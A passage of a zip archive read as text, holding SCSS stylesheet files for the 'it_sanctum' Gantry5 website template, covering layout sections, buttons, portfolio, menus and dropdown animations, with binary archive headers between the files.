	font-weight: $font-weight-medium;
}

// Blockquote
blockquote {
	border-left: 10px solid $rule-color;
	p {
		font-size: $fontsizes-body-font-size + 0.1;
		color: lighten($base-text-color, 20%);
		margin-bottom: 1rem !important;
	}
	cite {
		display: block;
		text-align: right;
		color: $base-text-color;
		font-size: $fontsizes-body-font-size + 0.2;
	}
	small {
		&:before {
			content: none !important;
		}
	}
}

// Inline and Code
code {
	background: $code-bg;
	color: $code-text;
	font-size: $fontsizes-body-font-size*0.9;
	border: 1px solid $base-border-color;
}

pre {
	padding: 1rem;
	margin: 2rem 0;
	background: $pre-bg;
	border: 1px solid $base-border-color;
	border-radius: $core-border-radius;
	line-height: 1.15;
	font-size: $fontsizes-body-font-size*0.9;
	border: 1px solid $base-border-color;

	code {
		color: $pre-text;
		background: inherit;
		font-size: $fontsizes-body-font-size*0.9;
	}
	&.prettyprint {
		border: 1px solid $base-border-color !important;
		padding: 1rem !important;
	}
}

// Additional
hr {
	border-bottom: 1px solid $base-border-color;
	&.uk-article-divider {
		border-color: $base-border-color;
		margin-bottom: 35px;
	}
}

* + .uk-article-divider {
	margin-top: 35px;
}

.uk-table-hover tbody tr:hover {
	background: $base-element-color;
}

.uk-badge {
	margin-right: 5px;
}

.g-typography-page {
	> section {
		margin-top: 150px;
		&:first-child {
			margin-top: 0;
		}
	}
}

iframe {
	border: none;
}

.uk-accordion {
	.uk-accordion-title {
		background: $base-element-color;
		border: 1px solid $base-border-color;
		border-radius: 3px;
	}
}

.uk-tab-grid::before {
	border-color: $base-border-color;
}PK!v9����0it_sanctum/scss/sanctum/_particle-overrides.scssnu&1i�// Override for Particles Title and Introtext that comes from "UIkit for Gantry5" atom
body {
	.g-particle-intro {
		margin-bottom: 3rem;
		text-align: center;
		.g-particle-intro {
			margin-bottom: 3rem;
		}
		.g-main-title {
			margin-bottom: 0;
		}
		.g-title-separator {
			height: 1px;
			width: 70px;
			margin: 20px auto;
			background: $base-border-color;
			&.no-intro-text {
				margin: 2.5rem auto 0;
			}
		}
	}
}

#g-to-top {
	.style1 {
		#g-totop-button {
			border-radius: $core-border-radius;
		}
	}
}

.g-image-features {
	.g-image-features-item {
		box-shadow: none;
		border-radius: 0;
	}
	.g-image-features-image {
		position: relative;
		img {
			border-radius: 0;
		}
		&.uk-overlay {
			border-radius: 0;
		}
	}
	.uk-overlay-background {
		background: transparentize($accent-color-1, 0.5);
		border: 20px solid $white;
	}
	.g-image-features-link {
		font-style: initial;
		border-bottom: 1px solid $accent-color-1;
		display: inline-block;
		
		i {
			display: none;
		}
	}
}

.g-features-particle {
	.g-features-particle-icon, .g-circle-border {
		border-radius: 0;
	}
	.g-features-particle-item {
		&:hover {
			.g-circle-border {
				border-color: $base-border-color;
			}
		}
	}
}

.g-features2-particle {
	&.style5 {
		.g-features2-particle-icon {
			border-radius: 0;
		}
	}
}

.g-slideshow {
	.g-slideshow-title,
	.g-slideshow-desc {
		color: $base-text-color !important;
		@include breakpoint(mobile-only) {
			display: initial;
		}
	}
	.uk-overlay-background {
		background: transparent;
	}
	.style2 {
		.g-slideshow-title {
			font-size: 3rem;
			color: $base-text-color !important;
			@include breakpoint(mobile-only) {
				font-size: 1rem;
			}
		}
		.g-slideshow-desc {
			font-size: 3rem;
			background: $accent-color-1;
			font-family: get-font-family($fonts-heading-font);
			@include breakpoint(mobile-only) {
				font-size: 1rem;
				display: initial;
			}
		}
	}
	@include breakpoint(mobile-only) {
		.uk-slideshow > li {
			min-height: 300px;
		}
	}
	.uk-dotnav {
		margin-left: -15px;
	}
}

.g-content-pro, .g-content-pro-slider, .g-content-pro-slideset {
	.g-content-pro-item {
		border: 1px solid $base-border-color;
		
		.uk-overlay-bottom {
			top: 0px;
		}
	}
	&.style3 {
		.g-content-pro-item {
			border: none;
		}
		.g-info-container-style2 {
			background: rgba(255,255,255,0.9);
			border: 0px;
			margin: 1.5rem;
			@include display(flex);
			@include align-items(center);
			@include align-content(center);
			@include flex-wrap(wrap);

			.g-content-pro-title {
				margin: 0 auto;
				a {
					color: $accent-color-1;
					&:hover {
						text-decoration: none;
						color: darken($accent-color-1, 15%);
					}
				}
				&:after {
					content: "";
					width: 70px;
					height: 1px;
					display: block;
					background: $accent-color-1;
					margin: 1rem auto;
				}
			}
			.g-content-pro-desc {
				color: $base-text-color;
			}
			.g-content-pro-special {
				color: $base-text-color;
			}
			a {
				color: $accent-color-1;
				&:hover {
					text-decoration: none;
					color: darken($accent-color-1, 15%);
				}
			}
			.g-content-pro-image {
				.uk-overlay-area-content {
					display: inline-block !important;
				}
			}
		}
	}
	.uk-overlay-background {
		background: transparentize($accent-color-1, 0.5);
		border: 20px solid $white;
	}
}

.g-accordion {
	.g-accordion-item {
		.uk-accordion-title {
			background: $white;
			padding: 0.675rem 1rem;
			border-radius: $core-border-radius;
			margin-bottom: 0;
			@include transition(all, 0.2s);
			&:hover,
			&.uk-active {
				border: 1px solid $base-border-color;
				background: transparent;
			}
		}
		.uk-accordion-content {
			color: $white;
			background: rgba(0,0,0,0.8);
			padding: 15px;
		}
		margin-bottom: 10px;
		&:last-child {
			margin-bottom: 0;
		}
	}
}

.g-onepage-menu {
	ul {
		border-radius: $core-border-radius;
		
		li {
			a {
				padding: 1rem;
				&:hover {
					color: $white;
					background: $accent-color-1;
				}
			}
			&:first-child {
				a {
					@include border-top-radius($core-border-radius);
				}
			}
			&:last-child {
				a {
					@include border-bottom-radius($core-border-radius);
				}
			}
			&.uk-active {
				> a {
					color: $white;
					background: $accent-color-1;
				}
			}
		}
		.submenu {
			li {
				a {
					border-radius: 0;
					padding: 1rem;
				}
			}
		}
	}
}

.g-portfolio {
	.g-portfolio-filter {
		&.uk-subnav-pill > * > * {
			border-radius: 0;
		}
	}
	.g-portfolio-item {
		.g-portfolio-image {
			.uk-overlay-background {
				background: transparentize($accent-color-1, 0.5);
				border: 20px solid $white;
			}
		}
	}
}

body {
	// Offcanvas Toggle
	.offcanvas-toggle-particle {
		&.g-offcanvas-toggle {
			color: $navigation-text-color;
			&:hover {
				color: $accent-color-1;
			}
		}
	}
}PK!���II!it_sanctum/scss/sanctum/_top.scssnu&1i�#g-top {
	background-color: $top-background-color;
	@if $top-background-image {
    	background-image: url($top-background-image);
    	background-repeat: unquote($top-background-repeat);
    	background-size: unquote($top-background-size);
    	background-attachment: unquote($top-background-attachment);
	}
	border-bottom: 1px solid darken($top-background-color, 6%);
	color: $top-text-color;
	h1, h2, h3, h4, h5, h6, strong {
		color: $top-heading-color;
	}
	z-index: 1003;
	font-size: $fontsizes-body-font-size*0.9;

	.g-content {
		padding-top: 0;
		padding-bottom: 0;
		margin-top: 0;
		margin-bottom: 0;
	}

	.g-block {
		&:last-child {
			text-align: right;
		}
		&:first-child {
			text-align: left;
		}
	}

	> .g-container {
		position: relative;
	}

	//Top Menu Styling
	.g-main-nav {
		font-size: $fontsizes-body-font-size*0.9;
		font-family: get-font-family($fonts-body-font);
		.g-toplevel {
			> li {
				border-right: 1px solid darken($top-background-color, 6%);
				margin: 0;
				margin-left: -4px;
				&:first-child {
					border-left: 1px solid darken($top-background-color, 6%);
					margin-left: 0;
				}
				&:last-child {
					margin-left: -4px;
					.g-menu-item-container {
						padding: 9.125px 15px;
					}
				}
				> .g-menu-item-container {
					padding: 9.125px 15px;
					line-height: inherit;
					color: $top-text-color;
					a {
						color: $top-text-color;
						&:hover {
							color: $accent-color-1;
						}
					}
					.g-menu-parent-indicator {					
						&:after {
							content: "\f107";
							opacity: 0.75;
							border: 1px solid $base-border-color;
							background: darken($top-background-color, 3%);
							margin-left: 5px;
							border-radius: 4px;
							width: 1.5rem;
							text-align: center;
							line-height: 1;
						}
					}
				}
				&:hover {
					> .g-menu-item-container {
						color: $accent-color-1;
					}
				}
			}
		}
		.g-dropdown {
			background: #ffffff;
			border-radius: 0;
			box-shadow: 0 6px 6px rgba(0, 0, 0, 0.05);
			a {
				color: $top-text-color;
				padding: 9px 15px;
			}
			li {
				border-bottom: 1px solid $base-border-color;
			}
			.g-dropdown-column {
				border-bottom: none;
			}
		}

		.g-sublevel {
			> li {
				> .g-menu-item-container {
					color: $top-text-color;
					font-weight: normal;				
				}

				&:hover {
					> .g-menu-item-container {
						background: $base-element-color;
						color: darken($header-text-color, 20%);
					}
				}

				&:last-child {
					border-bottom: none;					
				}
			}
			> li.g-parent .g-menu-parent-indicator {
				top: 9px;
			}
		}
	}
	
	.g-social {
		a {
			width: 2.5rem;
			text-align: center;
			@include breakpoint(mobile-only) {
				width: 2rem;
			}
		}
	}
	
	.g-paypaldonate {
		margin: 0;
		text-align: right;
		.g-paypaldonate-form {
			.g-paypaldonate-button {
				margin-bottom: -1px;
				.g-paypaldonate-icon {
					padding: 0.75rem;
				}
				input[type="submit"] {
					padding: 0 0.75rem;
				}
			}
		}
	}
	
	.size-50 {
		@include breakpoint(mobile-only) {
			flex-basis: 50%;
		}
	}
}

@media print {
	#g-top {
		background: #fff !important;
		color: #000 !important;
	}
}PK!n���~~(it_sanctum/scss/sanctum/_breadcrumb.scssnu&1i�#g-breadcrumb {
	padding: 1rem 0;
	background-color: $breadcrumb-background-color;
	@if $breadcrumb-background-image {
    	background-image: url($breadcrumb-background-image);
    	background-repeat: unquote($breadcrumb-background-repeat);
    	background-size: unquote($breadcrumb-background-size);
    	background-attachment: unquote($breadcrumb-background-attachment);
	}
	color: $breadcrumb-text-color;
	h1, h2, h3, h4, h5, h6, strong {
		color: $breadcrumb-heading-color;
	}
	@include breakpoint(mobile-only) {
		text-align: center;
	}
}

@media print {
	#g-breadcrumb {
		background: #fff !important;
		color: #000 !important;
	}
}PK!6K���$it_sanctum/scss/sanctum/_social.scssnu&1i�.g-social {
	a {
		display: inline-block;
		padding: 8px 10px;
		background: none;
		color: $top-text-color;
		font-size: 0.9rem;
		margin-left: -4px;
		border-right: 1px solid darken($top-background-color, 6%);
		&:first-child {
			border-left: 1px solid darken($top-background-color, 6%);
			margin-left: 0;
		}
		&:hover {
			color: $accent-color-1;
		}
	}
}

#g-copyright {
	.g-social {
		a {
			padding: 0 10px;
			color: $copyright-text-color;
			margin: 0;
			border: none;
			&:first-child {
				border: none;
			}
			&:hover {
				color: $accent-color-1;
			}
		}
	}
}

#g-copyright {
	.g-block {
		&:last-child {
			.g-social {
				margin-right: -10px;
				@include breakpoint(mobile-only) {
					margin-right: 0;
				}
			}
		}
	}
}

PK!BN�	99"it_sanctum/scss/sanctum/_last.scssnu&1i�#g-last {
	padding: $section-padding 0;
	background-color: $last-background-color;
	@if $last-background-image {
    	background-image: url($last-background-image);
    	background-repeat: unquote($last-background-repeat);
    	background-size: unquote($last-background-size);
    	background-attachment: unquote($last-background-attachment);
    	background-position: right center;
	}
	color: $last-text-color;
	h1, h2, h3, h4, h5, h6, strong {
		color: $last-heading-color;
	}
}

@media print {
	#g-last {
		background: #fff !important;
		color: #000 !important;
	}
}PK!M�����#it_sanctum/scss/sanctum/_forms.scssnu&1i�textarea, select[multiple=multiple] {
	background-color: white;
	border: 1px solid $base-border-color;
	box-shadow: $base-box-shadow;

	&:hover {
		border-color: $border-color-hover;
	}

	&:focus {
		border-color: $border-color-focus;
	}
}

#{$all-text-inputs} {
	background-color: white;
	border: 1px solid $base-border-color;
	box-shadow: $base-box-shadow;
}

#{$all-text-inputs-hover} {
	border-color: $border-color-hover;
}

#{$all-text-inputs-focus} {
	border-color: $border-color-focus;
}PK!#9�QCC'it_sanctum/scss/sanctum/_prebottom.scssnu&1i�#g-prebottom {
	padding: $section-padding 0;
	background-color: $prebottom-background-color;
	@if $prebottom-background-image {
    	background-image: url($prebottom-background-image);
    	background-repeat: unquote($prebottom-background-repeat);
    	background-size: unquote($prebottom-background-size);
    	background-attachment: unquote($prebottom-background-attachment);
	}
	color: $prebottom-text-color;
	h1, h2, h3, h4, h5, h6, strong {
		color: $prebottom-heading-color;
	}
}

@media print {
	#g-prebottom {
		background: #fff !important;
		color: #000 !important;
	}
}PK!�A�z//%it_sanctum/scss/sanctum/_utility.scssnu&1i�#g-utility {
	padding: $section-padding 0;
	background-color: $utility-background-color;
	@if $utility-background-image {
    	background-image: url($utility-background-image);
    	background-repeat: unquote($utility-background-repeat);
    	background-size: unquote($utility-background-size);
    	background-attachment: unquote($utility-background-attachment);
	}
	color: $utility-text-color;
	h1, h2, h3, h4, h5, h6, strong {
		color: $utility-heading-color;
	}
}

@media print {
	#g-utility {
		background: #fff !important;
		color: #000 !important;
	}
}PK!-�PG::&it_sanctum/scss/sanctum/_mainbody.scssnu&1i�#g-mainbody {
	padding: $section-padding 0;
	background-color: $mainbody-background-color;
	@if $mainbody-background-image {
    	background-image: url($mainbody-background-image);
    	background-repeat: unquote($mainbody-background-repeat);
    	background-size: unquote($mainbody-background-size);
    	background-attachment: unquote($mainbody-background-attachment);
	}
	color: $mainbody-text-color;
	h1, h2, h3, h4, h5, h6, strong {
		color: $mainbody-heading-color;
	}
}

@media print {
	#g-mainbody {
		background: #fff !important;
		color: #000 !important;
	}
}
PK!_�W���(it_sanctum/scss/sanctum/_cta-button.scssnu&1i�.g-cta-button {
	&.style1 {
		.g-cta-inner {
			padding: 30px;
			border: 1px solid $base-border-color;
			border-left: 2px solid $accent-color-1;
			background: #ffffff;
			@include breakpoint(desktop-range) {
				padding: 20px;
			}
			.g-cta-left {
				float: left;
				@include breakpoint(mobile-only) {
					float: none;
					display: block;
				}
				@include breakpoint(tablet-range) {
					float: none;
					display: block;			
				}
				&.no-desc {
					.g-cta-title {
						margin: 12px 0 0;
						@include breakpoint(mobile-only) {
							margin-bottom: 25px;
						}
						@include breakpoint(tablet-range) {
							margin-bottom: 25px;
						}
					}
				}
			}
			.g-cta-right {
				float: right;
				margin-top: 4px;
				@include breakpoint(mobile-only) {
					float: none;
					display: block;
					margin-top: 25px;
				}
				@include breakpoint(tablet-range) {
					float: none;
					display: block;
					margin-top: 25px;			
				}
				&.no-desc {
					margin-top: 0;
				}
				.button {
					font-size: 1rem;
					padding: 1rem 1.5rem;
					@include breakpoint(mobile-only) {
						display: block;
						text-align: center;
					}
					@include breakpoint(tablet-range) {
						display: block;
						text-align: center;
					}
					@include breakpoint(desktop-range) {
						padding: 1rem;
					}
					i {
						margin-right: 10px;
					}
				}
			}
			.g-cta-title {
				margin: 0 0 10px;
			}
		}
	}
	&.style2 {
		.g-cta-inner {
			@include breakpoint(mobile-only) {
				margin-bottom: 1.5rem;
			}
			@include breakpoint(tablet-range) {
				margin-bottom: 1.5rem;
			}
			.g-cta-left {
				float: left;
				@include breakpoint(mobile-only) {
					float: none;
					display: block;
					text-align: center;
				}
				@include breakpoint(tablet-range) {
					float: none;
					display: block;
					text-align: center;		
				}
				&.no-desc {
					.g-cta-title {
						margin: 12px 0 0;
						@include breakpoint(mobile-only) {
							margin-bottom: 25px;
						}
						@include breakpoint(tablet-range) {
							margin-bottom: 25px;
						}
					}
				}
			}
			.g-cta-right {
				float: right;
				margin-top: 4px;
				@include breakpoint(mobile-only) {
					float: none;
					display: block;
					margin-top: 25px;
				}
				@include breakpoint(tablet-range) {
					float: none;
					display: block;
					margin-top: 25px;			
				}
				&.no-desc {
					margin-top: 0;
				}
				.button {
					font-size: 1rem;
					padding: 1rem 1.5rem;
					background-color: transparent;
					color: $accent-color-1;
					border: 2px solid $accent-color-1;
					@include transition(all 0.2s);
					&:hover {
						background-color: $accent-color-1;
						color: #ffffff;
					}
					@include breakpoint(mobile-only) {
						display: block;
						text-align: center;
					}
					@include breakpoint(tablet-range) {
						display: block;
						text-align: center;
					}
					@include breakpoint(desktop-range) {
						padding: 1rem;
					}
					i {
						margin-right: 10px;
					}
				}
			}
			.g-cta-title {
				margin: 0 0 10px;
			}
		}
	}
}PK!�^���,it_sanctum/scss/sanctum/_systemmessages.scssnu&1i�#g-system-messages {
	background-color: $systemmessages-background-color;
	@if $systemmessages-background-image {
    	background-image: url($systemmessages-background-image);
    	background-repeat: unquote($systemmessages-background-repeat);
    	background-size: unquote($systemmessages-background-size);
    	background-attachment: unquote($systemmessages-background-attachment);
	}
	color: $systemmessages-text-color;
	h1, h2, h3, h4, h5, h6, strong {
		color: $systemmessages-heading-color;
	}
}

@media print {
	#g-system-messages {
		background: #fff !important;
		color: #000 !important;
	}
}

#system-message-container {
	#system-message {
		padding: 0;
		.alert {
			padding: 25px;
			margin: ($section-padding + $content-padding + $content-margin) ($content-padding + $content-margin) 0 ($content-padding + $content-margin);
			.close {
				position: static;
				&:hover {
					text-decoration: none;
				}
			}
			p {
				margin: 15px 0 0 0;
			}
		}
	}
}PK!afɼ�'it_sanctum/scss/sanctum/_portfolio.scssnu&1i�// Set the variable defaults in case they are missing in the template
$base-title-color: #4d4d4d !default;

.g-portfolio {
	.g-portfolio-filter {
		margin-bottom: 30px;
		&.uk-subnav > * {

		}
		&.uk-subnav > * > * {
			color: $base-text-color;
		}
		&.uk-subnav-pill > * > * {
			padding: 3px 8px;
			border: 1px solid $base-border-color;
			background: #ffffff;
			@include transition(all, 0.2s);
			&:focus, &:hover {
				background: #ffffff;
				box-shadow: none;
				border: 1px solid $accent-color-1;
				color: $accent-color-1;
			}
		}
		.uk-active {
			> a {
				background: #ffffff;
				border: 1px solid $accent-color-1;
				color: $accent-color-1;
				box-shadow: none;
			}
		}
	}
	.g-portfolio-item {
		border: 1px solid $base-border-color;
	}
	&.gutter-disabled {
		.g-portfolio-item {
			border: none;
		}
	}
	.g-portfolio-image {
		> a {
			display: block;
		}
	}
	.g-info-container {
		padding: 20px;
		background: #ffffff;
	}
	p {
		margin: 0;
	}
	.g-portfolio-title {
		margin: 0;
		a {
			color: $base-title-color;
			&:hover {
				color: $accent-color-1;
			}
		}
	}
	.g-item-details {
		margin-top: 10px;
		font-size: 90%;
		color: lighten($base-text-color, 20%);
		font-style: italic;
		i {
			margin-right: 5px;
		}
	}
	.g-portfolio-desc {
		margin-top: 10px;
	}
	.g-info-container-style2 {
		&.uk-overlay-panel {
			padding: 15px;
			p {
				margin-top: 5px;
			}
			a {
				color: #ffffff;
				&:hover {
					color: $accent-color-1;
				}
			}
		}
		.g-portfolio-special, .g-item-details {
			color: lighten($base-text-color, 35%);
		}
	}
	.g-portfolio-special {
		color: lighten($base-text-color, 20%);
		font-style: italic;
		float: left;
		@include breakpoint(small-mobile-range)  {
			float: none;
		}
		@include breakpoint(tablet-range) {
			float: none;
		}
		i {
			margin-right: 5px;
		}
	}
	.g-portfolio-link {
		float: right;
		font-style: italic;
		i {
			margin-left: 10px;
		}
		@include breakpoint(small-mobile-range) {
			float: none;
			margin-top: 5px;
		}
		@include breakpoint(tablet-range) {
			float: none;
			margin-top: 5px;
		}
	}
	.no-special {
		.g-portfolio-link {
			float: none;
		}
	}
	.no-link {
		.g-portfolio-special {
			float: none;
		}
	}
	.g-bottom-info {
		margin-top: 15px;
	}
	&.style3 {
		.g-info-container {
			position: absolute;
			visibility: hidden;
			z-index: 9;
			opacity: 0;
			border: 1px solid $base-border-color;
			border-top: none;
			width: 100%;
			@include transition(opacity 0.3s);
		}
		.g-portfolio-item {
			border: none;
			position: relative;
			&:hover {
				.g-info-container {
					visibility: visible;
					opacity: 1;
				}
			}
		}
	}
	&.style4 {
		.g-info-container-style2 {
			@include background(linear-gradient(to bottom, rgba(0, 0, 0, 0) 0px, rgba(0, 0, 0, 0.15) 20%, rgba(0, 0, 0, 0.8) 100%));
			padding: 20px;
			a {
				color: #ffffff;
				&:hover {
					color: #ffffff;
					text-decoration: underline;
				}
			}
		}
		.g-portfolio-image {
			.uk-overlay {
				img {
					@include transition(all 1s);
				}
			}
			&:hover {
				.uk-overlay {
					img {
						@include transform(scale(1.15));
					}
				}
			}
		}
	}
}

.portfolio-special {
	.g-portfolio-filter {
		text-align: center;
		position: relative;
		top: -50px;
		margin-bottom: 0;
		justify-content: center;
	}
}

#g-fullwidth, .g-flushed {
	.g-portfolio {
		&.gutter-enabled {
			padding: 30px;
		}
		&.filters-enabled {
			&.gutter-enabled {
				padding-top: 0;
			}
		}
		.g-portfolio-filter {
			border-bottom: 1px solid #f0f0f0;
			&.uk-subnav-pill > * > * {
				padding: 0;
				border: none;
				height: 50px;
				width: 100%;
				line-height: 50px;
				font-weight: bold;
				font-size: 1rem;
				border-radius: 0;
				@include breakpoint(desktop-range) {
					font-size: 0.9rem;
					font-weight: normal;
				}
				@include breakpoint(tablet-range) {
					height: auto;
					line-height: inherit;
					padding: 13px 0;
					font-size: 0.8rem;
					font-weight: normal;
				}
				@include breakpoint(mobile-only) {
					height: auto;
					line-height: inherit;
					padding: 13px 0;
					font-size: 0.8rem;
					font-weight: normal;
				}
			}
			&.uk-subnav {
				margin-left: -30px;
				margin-right: -30px;
				> * {
					padding-left: 0;
					border-right: 1px solid #f0f0f0;
					@include flex(1);
					text-align: center;
				}
			}
		}
		&.gutter-disabled {
			.g-portfolio-filter {
				margin-bottom: 0;
				&.uk-subnav {
					padding: 0 30px;
				}
			}
		}
	}
}

.uk-tooltip {
	&.g-portfolio-tooltip {
		padding: 6px 12px;
		font-size: 13px;
	}
}PK!�D&it_sanctum/scss/sanctum/_core_der.scssnu&1i�body, #g-page-surround {
	color: $base-text-color;
	background-color: $base-background-color;
	@if $base-background-image {
    	background-image: url($base-background-image);
    	background-repeat: unquote($base-background-repeat) !important;
    	background-size: unquote($base-background-size) !important;
    	background-attachment: unquote($base-background-attachment);
	}
	-webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
}

#g-page-surround {
	box-shadow: 0 0 15px rgba(0, 0, 0, 0.4);
}

@media print {
	#g-page-surround {
		background: #fff !important;
		color: #000 !important;
	}
}

a {
	color: $accent-color-1;
	@include transition(color 0.2s);
	&:hover {
		color: darken($accent-color-1, 15%);
	}
}

h1, h2, h3, h4, h5, h6, strong {
	color: $base-title-color;
}

.button {
	display: inline-block;
	padding: 0.5rem 1rem;
	border-radius: $core-border-radius;
	background: $accent-color-1;
	color: $white;
	border: 1px solid $accent-color-1;
	line-height: $core-line-height;
	font-size: $fontsizes-body-font-size;
	vertical-align: middle;
	text-shadow: none;
	box-shadow: none;
	text-align: center;
	@include transition(background 0.2s);
	&:hover {
		color: $white;
		background: darken($accent-color-1, 8%);
	}
	&:active, &:focus {
		color: $white;
		background: darken($accent-color-1, 6%);
	}
	&.dark {
		background: $base-title-color;
		border: 1px solid $base-title-color;
		&:hover, &:active, &:focus {
			background: lighten($base-title-color, 12%);
		}
	}
	&.empty {
		background: none;
		border: 1px solid $accent-color-1;
		color: $accent-color-1;
		@include transition(all 0.2s);
		&:hover {
			color: #ffffff;
			background: $accent-color-1;
		}
	}
}

.button {
	&.button-grey {
		background: #a8a8a8;
		color: $white;
		border: 1px solid #a8a8a8;
		&:hover {
			background: darken(#a8a8a8, 6%);
			border: 1px solid darken(#a8a8a8, 6%);
		}
	}
	&.button-green {
		background: #4f953b;
		border: 1px solid #4f953b;
		&:hover {
			background: darken(#4f953b, 6%);
			border: 1px solid darken(#4f953b, 6%);
		}
	}
	&.button-orange {
		background: #f26d5b;
		border: 1px solid #f26d5b;
		&:hover {
			background: darken(#f26d5b, 6%);
			border: 1px solid #f26d5b;
		}
	}
	&.button-purple {
		background: #8283a7;
		border: 1px solid #8283a7;
		&:hover {
			background: darken(#8283a7, 6%);
			border: 1px solid darken(#8283a7, 6%);
		}
	}
	&.button-blue {
		background: #2b90d9;
		border: 1px solid #2b90d9;
		&:hover {
			background: darken(#2b90d9, 6%);
			border: 1px solid darken(#2b90d9, 6%);
		}
	}
	&.button-xlarge {
		font-size: 1.4rem
	}
	&.button-large {
		font-size: 1.2rem
	}
	&.button-small {
		font-size: 0.8rem
	}
	&.button-xsmall {
		font-size: 0.7rem
	}
	&.button-block {
		display: block;
	}
}

.g-title {
	margin-top: -5px;
	margin-bottom: 30px;
	position: relative;
	&:after {
		content:"";
		height: 1px;
		width: 70px;
		margin: 20px 0;
		display: block;
		background: $base-border-color;
	}
}

#g-offcanvas, .g-particle-intro {
	.g-title {
		&:before, &:after {
			display: none;
		}
	}
}

#g-aside, #g-sidebar {
	.g-title {
		font-size: $fontsizes-body-font-size*1.5;
		margin-top: 0;
		margin-bottom: 25px;
		&:before, &:after {
			width: 60px;
			@include breakpoint(tablet-range) {
				display: none;
			}
		}
	}
	.text-center, .title-center {
		.g-title {
			&:before, &:after {
				width: 40px;
			}
		}
	}
	.g-content {
		> div {
			margin-bottom: 50px;
			&:last-child {
				margin-bottom: 0;
			}
		}
	}
}

// Border utility classes
.border-bottom {
	border-bottom: 1px solid $base-border-color;
}

.border-top {
	border-top: 1px solid $base-border-color;
}

.g-logo {
	margin: 10px 0;
	> .g-content {
		margin-top: 0;
		margin-bottom: 0;
	}
	display: inline-block;
	@include breakpoint(mobile-only) {
		display: block;
		text-align: center;
	}
	img {
		width: auto;
	}
}

.logo-large {
	display: inline-block;
}

// Grid Gutter Utility Class
.g-gutter {
	margin-left: -($content-padding);
	margin-right: -($content-padding);
	.g-content {
		margin: 0;
		padding-top: 0;
		padding-bottom: 0;
	}
}

//Fullwidth Utility Class
.fullwidth-section {
	padding: 0 !important;
	> .g-container {
		width: 100%;
	}
	.g-content {
		padding: 0;
		margin: 0;
	}
}

// Center Vertical Utility Classes
.g-center-vertical {
	@include display(flex);
	@include align-items(center);
}

// Fix for Tooltip text styling
.tooltip {
	h1, h2, h3, h4, h5, h6, strong {
		color: #ffffff !important;
	}
}

// DEMO - Presets Menu classes
.presets-demo {
	.g-dropdown {
		.g-menu-item-container {
			&:before {
				content: "";
				position: absolute;
				width: 20px;
				height: 20px;
				margin-top: 2px;
				border-radius: 0px;
				background: #000000;
				border: 1px solid #ffffff;
			}
			.g-menu-item-content {
				margin-left: 30px;
			}
		}
		.preset1 {
			.g-menu-item-container {
				&:before {
					background: #c91f37;
				}
			}
		}
		.preset2 {
			.g-menu-item-container {
				&:before {
					background: #4f953b;
				}
			}
		}
		.preset3 {
			.g-menu-item-container {
				&:before {
					background: #f26d5b;
				}
			}
		}
		.preset4 {
			.g-menu-item-container {
				&:before {
					background: #8283a7;
				}
			}
		}
		.preset5 {
			.g-menu-item-container {
				&:before {
					background: #2b90d9;
				}
			}
		}
		.preset6 {
			.g-menu-item-container {
				&:before {
					background: #f2aa0f;
				}
			}
		}
	}
}

#g-mobilemenu-container {
	.presets-demo {
		.g-dropdown {
			.g-go-back {
				.g-menu-item-container {
					&:before {
						content: "\f053";
						position: relative;
						width: 1.28571em;
						height: auto;
						margin-top: 0;
						border-radius: 0;
						background: none;
					}
					.g-menu-item-content {
						margin-left: 30px;
					}
				}
			}
		}
	}
}

.g-perso {

font-family: "Lato";
    font-weight: 400;
    font-size: 0.9rem;
    color: #ffffff;
    background-color: #7ac572;
}PK!��	MM0it_sanctum/scss/sanctum/_dropdownanimations.scssnu&1i�.g-main-nav {
    .g-standard {
        .g-dropdown {
            @include transition(none);
        }

        .g-fade.g-dropdown {
            @include transition(opacity .3s ease-out, transform .3s ease-out);
        }

        .g-zoom.g-active {
            @include animation-duration(.3s);
            @include animation-name(g-dropdown-zoom);
        }

        .g-fade-in-up.g-active {
            @include animation-duration(.3s);
            @include animation-name(g-dropdown-fade-in-up);
        }
    }

    .g-fullwidth > {
        .g-dropdown {
            @include transition(none);
        }

        .g-fade.g-dropdown {
            @include transition(opacity .3s ease-out, transform .3s ease-out);
        }

        .g-zoom.g-active {
            @include animation-duration(.3s);
            @include animation-name(g-dropdown-zoom);
        }

        .g-fade-in-up.g-active {
            @include animation-duration(.3s);
            @include animation-name(g-dropdown-fade-in-up);
        }
    }
}

@include keyframes(g-dropdown-zoom) {
    0% {
        opacity: 0;
        @include transform(scale3d(.8, .8, .8));
    }
    100% {
        opacity: 1;
    }
}

@include keyframes(g-dropdown-fade-in-up) {
    0% {
        opacity: 0;
        @include transform(translate3d(0, 30px, 0));
    }
    100% {
        opacity: 1;
    }
}PK!���$//%it_sanctum/scss/sanctum/_feature.scssnu&1i�#g-feature {
	padding: $section-padding 0;
	background-color: $feature-background-color;
	@if $feature-background-image {
    	background-image: url($feature-background-image);
    	background-repeat: unquote($feature-background-repeat);
    	background-size: unquote($feature-background-size);
    	background-attachment: unquote($feature-background-attachment);
	}
	color: $feature-text-color;
	h1, h2, h3, h4, h5, h6, strong {
		color: $feature-heading-color;
	}
}

@media print {
	#g-feature {
		background: #fff !important;
		color: #000 !important;
	}
}PK!@t��<<'it_sanctum/scss/sanctum/_copyright.scssnu&1i�#g-copyright {
	padding: 10px 0;
	background-color: $copyright-background-color;
	@if $copyright-background-image {
    	background-image: url($copyright-background-image);
    	background-repeat: unquote($copyright-background-repeat);
    	background-size: unquote($copyright-background-size);
    	background-attachment: unquote($copyright-background-attachment);
	}
	color: $copyright-text-color;
	h1, h2, h3, h4, h5, h6, strong {
		color: $copyright-heading-color;
	}
	a {
		color: $accent-color-1;
		&:hover {
			color: lighten($copyright-text-color, 20%);
		}
	}
	.g-block {
		text-align: center;
	}
	@include breakpoint(mobile-only) {
		text-align: center;
	}
	&:before {
		left: 50%;
		margin-bottom: -50px;
		content:"";
		position: relative;
		display: block;
		width: 50px;
		height: 50px;
		-webkit-transform: translateX(-50%) rotate(45deg);
		transform: translateX(-50%) rotate(45deg);
		z-index: 10;
	}
	&:before {
		top: -35px;
		background: $copyright-background-color;
	}
}

@media print {
	#g-copyright {
		background: #fff !important;
		color: #000 !important;
	}
}PK!&w��&it_sanctum/scss/sanctum/_our-team.scssnu&1i�// Set the variable defaults in case they are missing in the template
$base-title-color: #4d4d4d !default;

.g-our-team {
	&:not(.gutter-disabled) {
		margin-left: -($content-padding);
		margin-right: -($content-padding);
		> .g-grid {
			margin-bottom: ($content-padding*2);
			&:last-child {
				margin-bottom: 0;
				> .g-block {
					&:last-child {
						.g-our-team-item {
